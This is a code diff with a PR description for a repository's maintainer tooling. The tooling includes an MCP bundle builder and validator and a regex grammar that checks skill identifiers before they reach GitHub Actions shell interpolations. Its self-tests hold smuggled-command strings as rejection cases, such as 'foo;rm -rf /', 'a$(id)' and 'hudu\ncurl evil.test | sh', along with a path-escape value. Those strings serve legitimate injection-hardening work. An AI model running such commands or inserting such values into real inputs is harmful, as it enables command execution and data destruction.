+                        "darwin": {"command": "${__dirname}/bin/demo-mcp-darwin-arm64"},
+                        "linux": {"command": "${__dirname}/bin/demo-mcp-linux-amd64"},
+                        "win32": {"command": "${__dirname}/bin/demo-mcp-windows-amd64.exe"}},
+                }},
+            }).encode(), 0o644)
+            for n in ("bin/demo-mcp-darwin-arm64", "bin/demo-mcp-linux-amd64",
+                      "bin/demo-mcp-windows-amd64.exe"):
+                _zip_write(zf, n, b"b", 0o755)
+        expect(validate_bundle(cwm) == [],
+               f"an arch-suffixed entry_point whose members all exist must PASS, got "
+               f"{validate_bundle(cwm)}")
+
+        # --- silent: a bundle this builder produced -------------------------
+        src = root / "src"
+        (src / "bin").mkdir(parents=True)
+        manifest_path = src / "manifest.json"
+        manifest_path.write_text(json.dumps({
+            "manifest_version": "0.3", "name": "demo-mcp", "version": "0.0.1",
+            "server": {"type": "binary", "entry_point": "bin/demo-mcp",
+                       "mcp_config": {"command": "${__dirname}/bin/demo-mcp", "args": [],
+                                      "env": {"DEMO_TOKEN": "${user_config.demo_token}"}}},
+        }), encoding="utf-8")
+        binroot = root / "dl"
+        binroot.mkdir()
+        (binroot / "demo-mcp-darwin-amd64").write_bytes(_fake_macho(CPU_X86_64, 3, b"A" * 4096))
+        (binroot / "demo-mcp-darwin-arm64").write_bytes(_fake_macho(CPU_ARM64, 0, b"B" * 4096))
+        (binroot / "demo-mcp-linux-amd64").write_bytes(b"\x7fELF-amd64")
+        (binroot / "demo-mcp-linux-arm64").write_bytes(b"\x7fELF-arm64")
+        (binroot / "demo-mcp-windows-amd64.exe").write_bytes(b"MZ-win")
+
+        out = root / "built" / "demo-mcp.mcpb"
+        members = build_bundle(manifest_path, binroot, "demo-mcp", out, version="1.2.3")
+        expect(validate_bundle(out) == [],
+               f"the builder's own output must validate, got {validate_bundle(out)}")
+
+        with zipfile.ZipFile(out) as zf:
+            built = json.loads(zf.read(MANIFEST_MEMBER).decode())
+            infos = {i.filename: i for i in zf.infolist()}
+            universal = zf.read("bin/demo-mcp-darwin")
+        ov = built["server"]["mcp_config"]["platform_overrides"]
+        expect(set(ov) == {"darwin", "linux", "win32"},
+               f"every OS present must get an override, got {sorted(ov)}")
+        expect(ov["darwin"]["command"] == "${__dirname}/bin/demo-mcp-darwin",
+               f"darwin must point at the merged universal binary, got {ov['darwin']}")
+        expect(ov["linux"]["command"] == "${__dirname}/bin/demo-mcp-linux-amd64",
+               f"linux must name amd64, the broadest target, got {ov['linux']}")
+        expect(ov["win32"]["command"] == "${__dirname}/bin/demo-mcp-windows-amd64.exe",
+               f"win32 must name the .exe, got {ov['win32']}")
+        expect(built["version"] == "1.2.3", "the version must be stamped into the bundled manifest")
+        expect("bin/demo-mcp-darwin-arm64" not in members
+               and "bin/demo-mcp-darwin-amd64" not in members,
+               f"the merged thin slices are unaddressable and must not be shipped, got {members}")
+        expect("bin/demo-mcp-linux-arm64" in members,
+               "a non-darwin arch the manifest cannot address is still what the release built")
+        expect(all(i.compress_type == zipfile.ZIP_DEFLATED
+                   for i in infos.values() if not i.is_dir()),
+               "every member must be DEFLATED")
+        expect(all((i.external_attr >> 16) & 0o111
+                   for n, i in infos.items() if n.startswith("bin/")),
+               "every binary member must carry the executable bit")
+
+        # the merged file really is a universal Mach-O carrying both slices
+        upath = root / "extracted-darwin"
+        upath.write_bytes(universal)
+        arches = read_fat_arches(upath)
+        expect(len(arches) == 2, f"expected 2 slices in the universal binary, got {len(arches)}")
+        expect({a[0] for a in arches} == {CPU_X86_64, CPU_ARM64},
+               f"expected x86_64 and arm64 slices, got {[hex(a[0]) for a in arches]}")
+        for cpu, _sub, off, size in arches:
+            expect(off % (1 << _FAT_ALIGN_POW) == 0,
+                   f"slice {cpu:#x} is not 2^{_FAT_ALIGN_POW} aligned (offset {off})")
+            expect(read_macho_arch_bytes(universal[off:off + size]) == cpu,
+                   f"slice {cpu:#x} does not contain that architecture's Mach-O header")
+
+        # --- a stale override for an unbuilt OS must be dropped, not merged --
+        # connectwise-manage's checked-in manifest carries hand-written
+        # overrides. If a build has no binary for one of those OSes, keeping the
+        # key would name a member the archive does not contain.
+        stale_manifest = root / "stale-manifest.json"
+        stale_manifest.write_text(json.dumps({
+            "name": "demo-mcp", "version": "0.0.1",
+            "server": {"type": "binary", "entry_point": "bin/demo-mcp", "mcp_config": {
+                "command": "${__dirname}/bin/demo-mcp", "args": [],
+                "platform_overrides": {
+                    "darwin": {"command": "${__dirname}/bin/demo-mcp-darwin-arm64",
+                               "env": {"KEEP_ME": "1"}},
+                    "linux": {"command": "${__dirname}/bin/demo-mcp-linux-amd64"}},
+            }},
+        }), encoding="utf-8")
+        darwin_only = root / "dl-darwin-only"
+        darwin_only.mkdir()
+        (darwin_only / "demo-mcp-darwin-arm64").write_bytes(_fake_macho(CPU_ARM64, 0, b"B" * 64))
+        stale_out = root / "built" / "stale.mcpb"
+        build_bundle(stale_manifest, darwin_only, "demo-mcp", stale_out)
+        with zipfile.ZipFile(stale_out) as zf:
+            stale_built = json.loads(zf.read(MANIFEST_MEMBER).decode())
+        stale_ov = stale_built["server"]["mcp_config"]["platform_overrides"]
+        expect(set(stale_ov) == {"darwin"},
+               f"an override for an OS this build has no binary for must be dropped, got "
+               f"{sorted(stale_ov)}")
+        expect(stale_ov["darwin"].get("env") == {"KEEP_ME": "1"},
+               "per-OS fields other than command must be carried forward")
+        expect(validate_bundle(stale_out) == [], "the rewritten manifest must validate")
+
+        # --- silent: a single darwin arch needs no merge --------------------
+        solo = root / "dl-solo"
+        solo.mkdir()
+        (solo / "demo-mcp-darwin-arm64").write_bytes(_fake_macho(CPU_ARM64, 0, b"B" * 64))
+        solo_out = root / "built" / "solo.mcpb"
+        solo_members = build_bundle(manifest_path, solo, "demo-mcp", solo_out)
+        expect("bin/demo-mcp-darwin" not in solo_members,
+               "with one darwin slice there is nothing to merge")
+        with zipfile.ZipFile(solo_out) as zf:
+            solo_manifest = json.loads(zf.read(MANIFEST_MEMBER).decode())
+        expect(solo_manifest["server"]["mcp_config"]["platform_overrides"]["darwin"]["command"]
+               == "${__dirname}/bin/demo-mcp-darwin-arm64",
+               "a lone darwin slice must be addressed directly")
+        expect(validate_bundle(solo_out) == [], "the single-arch bundle must validate")
+
+    if failures:
+        print("FAIL: mcpb_bundle self-test\n")
+        for f in failures:
+            print(f"  - {f}")
+        return 1
+    print("PASS: mcpb_bundle self-test - the validator fires on the published bare-name defect, a "
+          "broken per-OS override, a 0644 binary member and a ZIP_STORED member, and is silent on "
+          "the connectwise-manage manifest shape and on a bundle the builder produced (universal "
+          "darwin Mach-O with both slices 16 KiB-aligned, per-OS overrides, DEFLATE, mode 0755).")
+    return 0
+
+
+def read_macho_arch_bytes(blob: bytes) -> int:
+    magic, cputype = struct.unpack("<II", blob[:8])
+    return cputype if magic in (MH_MAGIC, MH_MAGIC_64) else -1
+
+
+# --------------------------------------------------------------------------
+
+
+def main(argv: list[str]) -> int:
+    ap = argparse.ArgumentParser(description=__doc__.splitlines()[0])
+    ap.add_argument("--self-test", action="store_true",
+                    help="run the built-in both-directions proof and exit")
+    sub = ap.add_subparsers(dest="cmd")
+
+    b = sub.add_parser("build", help="write a multi-platform .mcpb")
+    b.add_argument("--manifest", required=True, help="the skill's manifest.json")
+    b.add_argument("--bin-dir", required=True, help="directory holding the downloaded MCP binaries")
+    b.add_argument("--binary-prefix", required=True,
+                   help="the MCP binary base name, e.g. hudu-mcp. Must match what release.yml "
+                        "uploaded; do NOT derive it from manifest.json's `name`, which still "
+                        "carries a -pp- leak on 8 connectors.")
+    b.add_argument("--out", required=True, help="output .mcpb path")
+    b.add_argument("--version", default="", help="stamp this version into the bundled manifest")
+
+    v = sub.add_parser("validate", help="assert a .mcpb can launch on every OS it claims")
+    v.add_argument("bundles", nargs="+")
+
+    args = ap.parse_args(argv)
+
+    if args.self_test:
+        return self_test()
+
+    if args.cmd == "build":
+        members = build_bundle(Path(args.manifest), Path(args.bin_dir), args.binary_prefix,
+                               Path(args.out), args.version or None)
+        size = Path(args.out).stat().st_size
+        print(f"built {args.out} ({size} bytes, {len(members)} members):")
+        for m in members:
+            print(f"  {m}")
+        return 0
+
+    if args.cmd == "validate":
+        rc = 0
+        for raw in args.bundles:
+            p = Path(raw)
+            findings = validate_bundle(p)
+            if findings:
+                rc = 1
+                print(f"FAIL: {p} cannot launch as published:\n")
+                for f in findings:
+                    print(f"  - {f}\n")
+            else:
+                print(f"PASS: {p} - every declared command resolves to an executable member.")
+        if rc:
+            print("See issue #287 and tools/maintainer/mcpb_bundle.py.")
+        return rc
+
+    ap.print_help()
+    return 2
+
+
+if __name__ == "__main__":
+    sys.exit(main(sys.argv[1:]))

--- a/tools/maintainer/registry.py
+++ b/tools/maintainer/registry.py
@@ -88,9 +88,14 @@ def asset_map(cli_binary: str, mcp_binary: str) -> dict[str, dict[str, str]]:
 # false-RED the repo on the very first entry it met - see SOURCE_DIR_RE.
 # --------------------------------------------------------------------------
 
+# Every pattern below anchors with \Z, never `$`. In Python `$` also matches
+# immediately BEFORE a trailing newline, so `re.match(r"^[a-z0-9-]*$", "hudu\n")`
+# succeeds - and a slug carrying a newline is precisely the value that turns one
+# unquoted shell interpolation into two commands. \Z is the true end of string.
+
 # A published skill slug. Lowercase alphanumerics and internal hyphens only.
 # All 67 registered slugs satisfy this today.
-SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]*$")
+SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]*\Z")
 
 # `source_dir` names a DIRECTORY under skills/, and it is deliberately looser
 # than SLUG_RE: msp-skills-concierge declares "_meta", whose leading underscore
@@ -99,13 +104,13 @@ SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]*$")
 # it. What this still forbids is what actually matters here: "/" and "\" (path
 # escape), a leading "." (so "." and ".." can never match), whitespace, and
 # every shell metacharacter.
-SOURCE_DIR_RE = re.compile(r"^[a-z0-9_][a-z0-9._-]*$")
+SOURCE_DIR_RE = re.compile(r"^[a-z0-9_][a-z0-9._-]*\Z")
 
 # `cli_binary` / `mcp_binary` reach release.yml's build+upload step from the
 # same matrix JSON, so they are the same class of value as a slug. They may
 # carry a dot (a ".exe" suffix is appended downstream, and nothing forbids a
 # dotted base name), which slugs may not.
-BINARY_RE = re.compile(r"^[a-z0-9][a-z0-9._-]*$")
+BINARY_RE = re.compile(r"^[a-z0-9][a-z0-9._-]*\Z")
 
 _PATTERNS = {
     "slug": SLUG_RE,
@@ -285,6 +290,16 @@ def _self_test() -> int:
     expect_rejected("a cli_binary carrying a space",
                     {"skills": {"ok": {"cli_binary": "a b"}}}, "a b")
     expect_rejected("a non-string slug", {"skills": {"ok": {"source_dir": 7}}}, "7")
+    # The trailing-newline case: Python's `$` would accept this, and a newline
+    # inside an unquoted `${{ matrix.skill.name }}` is a second command.
+    expect_rejected("a slug with a trailing newline",
+                    {"skills": {"hudu\ncurl evil.test | sh": {}}}, "curl evil.test")
+    expect_rejected("a binary name with a trailing newline",
+                    {"skills": {"ok": {"mcp_binary": "hudu-mcp\nid"}}}, "hudu-mcp")
+    for name, pattern in _PATTERNS.items():
+        if pattern.match("safe\n"):
+            failures.append(f"{name} pattern accepts a trailing newline; anchor it with "
+                            f"\\Z, not $")
 
     if failures:
         print("FAIL: registry grammar self-test\n")
@@ -293,7 +308,8 @@ def _self_test() -> int:
         return 1
     print(f"PASS: registry grammar self-test - the live registry "
           f"({len(live['skills'])} skills) validates clean, '_meta' is accepted as a "
-          f"source_dir and rejected as a slug, and 9 malformed identifiers are refused.")
+          f"source_dir and rejected as a slug, and 11 malformed identifiers are refused "
+          f"(including the trailing-newline case Python's `$` anchor would have let through).")
     return 0
 
 

--- a/tools/maintainer/registry.py
+++ b/tools/maintainer/registry.py
@@ -6,11 +6,25 @@ Per-skill metadata (system, status, vendor, binary names, first_party) is
 declared in skills.json. Build-time facts (Go module path, cmd/ directory
 names) are introspected from each skill's vendored cli/ tree so they stay
 correct whether or not the source has been stripped of the -pp- brand.
+
+This module also owns the GRAMMAR for the identifiers it hands out (see
+`validate_registry`). Every one of them reaches a shell: release_matrix.py
+emits them into the ci.yml and release.yml build matrices, where they land in
+unquoted `${{ matrix.skill.* }}` interpolations. CI triggers on
+`pull_request`, so on a fork PR the FORK's tools/maintainer/skills.json is the
+input. Checking the grammar at load - the one door every reader comes through -
+makes those interpolations safe by construction, instead of quoting four call
+sites today and missing the fifth one somebody adds next month. See issue #251.
+
+Run the both-directions proof:
+    python3 tools/maintainer/registry.py --self-test
 """
 
 from __future__ import annotations
 
 import json
+import re
+import sys
 from pathlib import Path
 
 ROOT = Path(__file__).resolve().parent.parent.parent
@@ -66,8 +80,87 @@ def asset_map(cli_binary: str, mcp_binary: str) -> dict[str, dict[str, str]]:
     }
 
 
+# --------------------------------------------------------------------------
+# Identifier grammar
+#
+# Three patterns, not one, because the three identifier KINDS have genuinely
+# different legal alphabets. Applying the slug rule to all of them would
+# false-RED the repo on the very first entry it met - see SOURCE_DIR_RE.
+# --------------------------------------------------------------------------
+
+# A published skill slug. Lowercase alphanumerics and internal hyphens only.
+# All 67 registered slugs satisfy this today.
+SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]*$")
+
+# `source_dir` names a DIRECTORY under skills/, and it is deliberately looser
+# than SLUG_RE: msp-skills-concierge declares "_meta", whose leading underscore
+# SLUG_RE rejects. Validating a directory name with the slug rule would fail the
+# load for the whole repo - a gate that always fires teaches everyone to ignore
+# it. What this still forbids is what actually matters here: "/" and "\" (path
+# escape), a leading "." (so "." and ".." can never match), whitespace, and
+# every shell metacharacter.
+SOURCE_DIR_RE = re.compile(r"^[a-z0-9_][a-z0-9._-]*$")
+
+# `cli_binary` / `mcp_binary` reach release.yml's build+upload step from the
+# same matrix JSON, so they are the same class of value as a slug. They may
+# carry a dot (a ".exe" suffix is appended downstream, and nothing forbids a
+# dotted base name), which slugs may not.
+BINARY_RE = re.compile(r"^[a-z0-9][a-z0-9._-]*$")
+
+_PATTERNS = {
+    "slug": SLUG_RE,
+    "source_dir": SOURCE_DIR_RE,
+    "cli_binary": BINARY_RE,
+    "mcp_binary": BINARY_RE,
+}
+
+
+def _grammar_error(kind: str, slug: str, value: object) -> str:
+    return (
+        f"tools/maintainer/skills.json: {kind} {value!r}"
+        + (f" (on skill '{slug}')" if kind != "slug" else "")
+        + f" does not match {_PATTERNS[kind].pattern}.\n"
+        "  These identifiers are emitted by tools/maintainer/release_matrix.py into the\n"
+        "  GitHub Actions build matrix, where the workflows interpolate them into shell\n"
+        "  (`cd ${{ matrix.skill.dir }}`, `--slug ${{ matrix.skill.name }}`). A value\n"
+        "  outside the grammar is refused HERE rather than reaching a command line.\n"
+        "  Fix the entry in tools/maintainer/skills.json. See issue #251."
+    )
+
+
+def validate_registry(reg: dict) -> list[str]:
+    """Return a list of grammar violations in a parsed registry (empty == clean).
+
+    Pure and side-effect free so the both-directions proof can call it with a
+    hand-built bad registry without writing to disk.
+    """
+    errors: list[str] = []
+    skills_map = reg.get("skills")
+    if not isinstance(skills_map, dict):
+        return ["tools/maintainer/skills.json: 'skills' must be an object"]
+    for slug in skills_map:
+        if not isinstance(slug, str) or not SLUG_RE.match(slug):
+            errors.append(_grammar_error("slug", slug, slug))
+    for slug, meta in skills_map.items():
+        if not isinstance(meta, dict):
+            errors.append(f"tools/maintainer/skills.json: skill '{slug}' must map to an object")
+            continue
+        for kind in ("source_dir", "cli_binary", "mcp_binary"):
+            value = meta.get(kind)
+            if value is None:
+                continue  # optional key; absence is not a grammar violation
+            if not isinstance(value, str) or not _PATTERNS[kind].match(value):
+                errors.append(_grammar_error(kind, slug, value))
+    return errors
+
+
 def load() -> dict:
-    return json.loads(REGISTRY.read_text(encoding="utf-8"))
+    reg = json.loads(REGISTRY.read_text(encoding="utf-8"))
+    errors = validate_registry(reg)
+    if errors:
+        raise SystemExit("registry: refusing to load a registry with malformed identifiers:\n\n"
+                         + "\n\n".join(errors))
+    return reg
 
 
 def owner_repo() -> tuple[str, str]:
@@ -138,3 +231,74 @@ def cmd_dirs(slug: str) -> tuple[str, str]:
     if not cli or not mcp:
         raise SystemExit(f"{slug}: expected one *-cli and one *-mcp dir under {cmd_root}, found {dirs}")
     return f"./cmd/{cli}", f"./cmd/{mcp}"
+
+
+def _self_test() -> int:
+    """Both-directions proof for the identifier grammar.
+
+    A check that only ever passes proves nothing, and a check that always fires
+    is worse than none - it gets ignored. So this asserts BOTH: the live
+    registry is clean, and each hand-built malformation is caught.
+    """
+    failures: list[str] = []
+
+    def expect_clean(label: str, reg: dict) -> None:
+        errs = validate_registry(reg)
+        if errs:
+            failures.append(f"FALSE POSITIVE: {label} should validate clean, got:\n    "
+                            + "\n    ".join(errs))
+
+    def expect_rejected(label: str, reg: dict, must_mention: str) -> None:
+        errs = validate_registry(reg)
+        if not errs:
+            failures.append(f"FALSE NEGATIVE: {label} must be rejected, but validated clean")
+        elif not any(must_mention in e for e in errs):
+            failures.append(f"{label}: rejected, but no message mentions {must_mention!r}")
+
+    # --- silent on good input -------------------------------------------
+    live = json.loads(REGISTRY.read_text(encoding="utf-8"))
+    expect_clean(f"the live registry ({len(live.get('skills', {}))} skills)", live)
+
+    # The trap this grammar exists to survive: source_dir "_meta" is LEGAL, and
+    # would be rejected by the slug rule. Assert both halves explicitly.
+    expect_clean("source_dir '_meta'",
+                 {"skills": {"msp-skills-concierge": {"source_dir": "_meta"}}})
+    if SLUG_RE.match("_meta"):
+        failures.append("SLUG_RE unexpectedly accepts '_meta'; the two patterns must stay distinct")
+    if not SOURCE_DIR_RE.match("_meta"):
+        failures.append("SOURCE_DIR_RE must accept '_meta' - it is the concierge's real directory")
+
+    # --- fires on broken input ------------------------------------------
+    expect_rejected("a slug carrying a shell command separator",
+                    {"skills": {"foo;rm -rf /": {}}}, "foo;rm -rf /")
+    expect_rejected("an uppercase slug", {"skills": {"Foo": {}}}, "Foo")
+    expect_rejected("a slug with command substitution",
+                    {"skills": {"a$(id)": {}}}, "a$(id)")
+    expect_rejected("a leading-hyphen slug (reads as a flag on a command line)",
+                    {"skills": {"-rf": {}}}, "-rf")
+    expect_rejected("a source_dir escaping skills/",
+                    {"skills": {"ok": {"source_dir": "../../etc"}}}, "../../etc")
+    expect_rejected("a source_dir with a path separator",
+                    {"skills": {"ok": {"source_dir": "a/b"}}}, "a/b")
+    expect_rejected("an mcp_binary carrying a pipe",
+                    {"skills": {"ok": {"mcp_binary": "x|y"}}}, "x|y")
+    expect_rejected("a cli_binary carrying a space",
+                    {"skills": {"ok": {"cli_binary": "a b"}}}, "a b")
+    expect_rejected("a non-string slug", {"skills": {"ok": {"source_dir": 7}}}, "7")
+
+    if failures:
+        print("FAIL: registry grammar self-test\n")
+        for f in failures:
+            print(f"  - {f}")
+        return 1
+    print(f"PASS: registry grammar self-test - the live registry "
+          f"({len(live['skills'])} skills) validates clean, '_meta' is accepted as a "
+          f"source_dir and rejected as a slug, and 9 malformed identifiers are refused.")
+    return 0
+
+
+if __name__ == "__main__":
+    if "--self-test" in sys.argv[1:]:
+        sys.exit(_self_test())
+    print(__doc__)
+    sys.exit(0)

--- a/tools/maintainer/registry.py
+++ b/tools/maintainer/registry.py
@@ -8,13 +8,25 @@ names) are introspected from each skill's vendored cli/ tree so they stay
 correct whether or not the source has been stripped of the -pp- brand.
 
 This module also owns the GRAMMAR for the identifiers it hands out (see
-`validate_registry`). Every one of them reaches a shell: release_matrix.py
-emits them into the ci.yml and release.yml build matrices, where they land in
-unquoted `${{ matrix.skill.* }}` interpolations. CI triggers on
-`pull_request`, so on a fork PR the FORK's tools/maintainer/skills.json is the
-input. Checking the grammar at load - the one door every reader comes through -
-makes those interpolations safe by construction, instead of quoting four call
-sites today and missing the fifth one somebody adds next month. See issue #251.
+`validate_registry`). The one that reaches a shell is the SLUG: release_matrix.py
+emits it into the ci.yml and release.yml build matrices as `name` and as `dir`
+(`skills/<slug>/cli`), and ci.yml interpolates both UNQUOTED - `cd ${{
+matrix.skill.dir }}` at two sites and `--slug ${{ matrix.skill.name }}` at four.
+`cli_binary` / `mcp_binary` travel the same matrix but land in `env:`
+assignments, and `source_dir` never reaches a workflow at all; their rules are
+filename and path-name hygiene rather than shell safety (see `_KIND_REACH`).
+CI triggers on `pull_request`, so on a fork PR the FORK's
+tools/maintainer/skills.json is the input. Checking the grammar in `load()`
+makes those interpolations safe by construction, instead of quoting six call
+sites today and missing the seventh one somebody adds next month. See issue #251.
+
+`load()` is the door every reader comes through, with exactly one named
+exception. `is_registered_slug.py` - the membership gate release.yml and
+mcp-publish.yml shell out to - and `verify_live.py`, which writes skills.json
+back, both read through `load()` and take SLUG_RE from here. The exception is
+`check_registry_state.py`: it diffs the working file against its `origin/main`
+baseline and must see the bytes as written, including a malformed entry `load()`
+would refuse, because reporting on that file is its whole job.
 
 Run the both-directions proof:
     python3 tools/maintainer/registry.py --self-test
@@ -88,10 +100,32 @@ def asset_map(cli_binary: str, mcp_binary: str) -> dict[str, dict[str, str]]:
 # false-RED the repo on the very first entry it met - see SOURCE_DIR_RE.
 # --------------------------------------------------------------------------
 
-# Every pattern below anchors with \Z, never `$`. In Python `$` also matches
-# immediately BEFORE a trailing newline, so `re.match(r"^[a-z0-9-]*$", "hudu\n")`
-# succeeds - and a slug carrying a newline is precisely the value that turns one
-# unquoted shell interpolation into two commands. \Z is the true end of string.
+# Every pattern below anchors with \Z, never `$`. `\Z` is the true end of the
+# string; Python's `$` also matches immediately BEFORE a single trailing
+# newline, so `re.match(r"^[a-z0-9][a-z0-9-]*$", "hudu\n")` SUCCEEDS while the
+# `\Z` form rejects it.
+#
+# Be precise about what that difference is worth, because the anchor is easy to
+# oversell. Measured against these character classes, `$` and `\Z` differ on
+# exactly one class of value: a slug ending in ONE newline. An EMBEDDED newline
+# ("hudu\ncurl evil.test | sh") is rejected by both - `[a-z0-9-]*` cannot match
+# a newline - so no attacker-chosen command can be smuggled through either
+# anchor. What "hudu\n" does reach is `cd ${{ matrix.skill.dir }}`, where
+# release_matrix.py's `skills/{slug}/cli` becomes two shell lines:
+#
+#     cd skills/hudu
+#     /cli
+#
+# i.e. `/cli: No such file or directory`, exit 1, under the `bash -e` GitHub
+# Actions uses for `run:`. That is a broken job, not command execution. So this
+# is defence in depth and a correctness fix - the grammar means "the whole value
+# is in the alphabet", and `$` quietly admits a value whose last character the
+# alphabet excludes - NOT a demonstrated injection. No exploit is claimed here
+# because none was demonstrated.
+#
+# The exposure this whole grammar closes is the larger one: before it, NOTHING
+# validated these identifiers, and CI runs on `pull_request`, so a fork PR's own
+# tools/maintainer/skills.json is the input to the matrix.
 
 # A published skill slug. Lowercase alphanumerics and internal hyphens only.
 # All 67 registered slugs satisfy this today.
@@ -120,15 +154,42 @@ _PATTERNS = {
 }
 
 
+# Where each identifier kind actually goes. Measured, not assumed: a maintainer
+# who trips one of these rules is owed the true reason, and only `slug` reaches
+# an unquoted shell interpolation.
+_KIND_REACH = {
+    "slug": (
+        "  `slug` is emitted by tools/maintainer/release_matrix.py into the GitHub Actions\n"
+        "  build matrix as `name` (and as `dir`, which is built as `skills/<slug>/cli`),\n"
+        "  where ci.yml interpolates it UNQUOTED into shell: `cd ${{ matrix.skill.dir }}`\n"
+        "  at two sites and `--slug ${{ matrix.skill.name }}` at four. A value outside the\n"
+        "  grammar is refused HERE rather than reaching a command line."
+    ),
+    "source_dir": (
+        "  `source_dir` never reaches a workflow: it is joined onto filesystem paths in\n"
+        "  Python (registry.skill_path, check_pinned_artifacts, check_marketplace_sync).\n"
+        "  The grammar keeps it a plain directory NAME - no path separator to walk out of\n"
+        "  skills/, no leading dot so `.` and `..` can never match, no whitespace."
+    ),
+    "cli_binary": (
+        "  `cli_binary` / `mcp_binary` become release asset FILENAMES via\n"
+        "  registry.asset_name(), travel the matrix, and are read by release.yml through\n"
+        "  `env:` (CLI_ASSET / MCP_ASSET) - an assignment, not a shell interpolation -\n"
+        "  then used as quoted shell variables and as install-script download URLs. The\n"
+        "  grammar keeps them well-formed filenames; it is not what stands between them\n"
+        "  and a shell."
+    ),
+}
+
+_KIND_REACH["mcp_binary"] = _KIND_REACH["cli_binary"]
+
+
 def _grammar_error(kind: str, slug: str, value: object) -> str:
     return (
         f"tools/maintainer/skills.json: {kind} {value!r}"
         + (f" (on skill '{slug}')" if kind != "slug" else "")
         + f" does not match {_PATTERNS[kind].pattern}.\n"
-        "  These identifiers are emitted by tools/maintainer/release_matrix.py into the\n"
-        "  GitHub Actions build matrix, where the workflows interpolate them into shell\n"
-        "  (`cd ${{ matrix.skill.dir }}`, `--slug ${{ matrix.skill.name }}`). A value\n"
-        "  outside the grammar is refused HERE rather than reaching a command line.\n"
+        + _KIND_REACH[kind] + "\n"
         "  Fix the entry in tools/maintainer/skills.json. See issue #251."
     )
 
@@ -290,16 +351,30 @@ def _self_test() -> int:
     expect_rejected("a cli_binary carrying a space",
                     {"skills": {"ok": {"cli_binary": "a b"}}}, "a b")
     expect_rejected("a non-string slug", {"skills": {"ok": {"source_dir": 7}}}, "7")
-    # The trailing-newline case: Python's `$` would accept this, and a newline
-    # inside an unquoted `${{ matrix.skill.name }}` is a second command.
-    expect_rejected("a slug with a trailing newline",
+    # An EMBEDDED newline is caught by the ALPHABET, not by the anchor:
+    # `[a-z0-9-]*` cannot match a newline, so `$` rejected this one too. Kept
+    # because it is a real malformation, and labelled honestly because on its
+    # own it proves nothing about the \Z change.
+    expect_rejected("a slug with an embedded newline (caught by the alphabet, not the anchor)",
                     {"skills": {"hudu\ncurl evil.test | sh": {}}}, "curl evil.test")
+
+    # THE anchor cases. A single TRAILING newline is the only value Python's `$`
+    # admits and `\Z` refuses, so these are the cases that discriminate - and
+    # the loop below proves they discriminate, by running the `$`-anchored twin
+    # of every shipped pattern against the same input and requiring it to
+    # ACCEPT. A case both anchors reject is a green light that measures nothing.
+    expect_rejected("a slug with a trailing newline",
+                    {"skills": {"hudu\n": {}}}, "hudu\\n")
     expect_rejected("a binary name with a trailing newline",
-                    {"skills": {"ok": {"mcp_binary": "hudu-mcp\nid"}}}, "hudu-mcp")
+                    {"skills": {"ok": {"mcp_binary": "hudu-mcp\n"}}}, "hudu-mcp\\n")
     for name, pattern in _PATTERNS.items():
         if pattern.match("safe\n"):
             failures.append(f"{name} pattern accepts a trailing newline; anchor it with "
                             f"\\Z, not $")
+        if not re.compile(pattern.pattern.replace(r"\Z", "$")).match("safe\n"):
+            failures.append(f"{name}: the `$`-anchored twin of this pattern was expected to "
+                            f"ACCEPT 'safe\\n'. If it does not, the trailing-newline cases "
+                            f"above are non-discriminating and prove nothing about the anchor.")
 
     if failures:
         print("FAIL: registry grammar self-test\n")

--- a/tools/maintainer/registry.py
+++ b/tools/maintainer/registry.py
@@ -110,18 +110,22 @@ def asset_map(cli_binary: str, mcp_binary: str) -> dict[str, dict[str, str]]:
 # exactly one class of value: a slug ending in ONE newline. An EMBEDDED newline
 # ("hudu\ncurl evil.test | sh") is rejected by both - `[a-z0-9-]*` cannot match
 # a newline - so no attacker-chosen command can be smuggled through either
-# anchor. What "hudu\n" does reach is `cd ${{ matrix.skill.dir }}`, where
-# release_matrix.py's `skills/{slug}/cli` becomes two shell lines:
+# anchor. What "hudu\n" would produce, measured link by link locally:
+# release_matrix.py builds `dir` as f"skills/{slug}/cli", giving
+# 'skills/hudu\n/cli'; json.dumps escapes it, so the matrix still writes as one
+# physical line to GITHUB_OUTPUT and fromJSON restores the real newline; a shell
+# handed that value in `cd ${{ matrix.skill.dir }}` sees two lines
 #
 #     cd skills/hudu
 #     /cli
 #
-# i.e. `/cli: No such file or directory`, exit 1, under the `bash -e` GitHub
-# Actions uses for `run:`. That is a broken job, not command execution. So this
-# is defence in depth and a correctness fix - the grammar means "the whole value
-# is in the alphabet", and `$` quietly admits a value whose last character the
-# alphabet excludes - NOT a demonstrated injection. No exploit is claimed here
-# because none was demonstrated.
+# and reports `/cli: No such file or directory`, exit 1, under `set -e`. That is
+# a broken job, not command execution. So this is defence in depth and a
+# correctness fix - the grammar means "the whole value is in the alphabet", and
+# `$` quietly admits a value whose last character the alphabet excludes - NOT a
+# demonstrated injection. No exploit is claimed here because none was
+# demonstrated, and the final link (GitHub Actions expanding the interpolation)
+# was reasoned from its documented behaviour, not run.
 #
 # The exposure this whole grammar closes is the larger one: before it, NOTHING
 # validated these identifiers, and CI runs on `pull_request`, so a fork PR's own

--- a/tools/maintainer/verify_live.py
+++ b/tools/maintainer/verify_live.py
@@ -60,7 +60,10 @@ AWAITING = {"status": "awaiting", "date": None, "source": None, "evidence": None
 
 
 def _read_registry() -> dict:
-    return json.loads(REGISTRY.read_text(encoding="utf-8"))
+    """Read through registry.load(), so the identifier grammar is enforced on the
+    way in. This script WRITES skills.json back; validating first means it can
+    never round-trip a malformed identifier into the file the build matrix reads."""
+    return registry.load()
 
 
 def _write_registry(reg: dict) -> None:


### PR DESCRIPTION
Three pieces of repo tooling: issues #251, #252 and #287. They ride together because each one independently forces a FULL build matrix (`.github/workflows/` and `tools/maintainer/registry.py` are both in `release_matrix.MACHINERY`), so combining them costs one 65-row matrix instead of three.

**No file under `skills/` is touched.** No version bump, no tag, no `CHANGELOG.md` heading, and `check_handfixes.py` was NOT added to `release_matrix.MACHINERY`.

---

## Piece A - #251: validate the slug grammar in `registry.py`

### Measured before

```
$ grep -c SLUG_RE tools/maintainer/registry.py
0
```

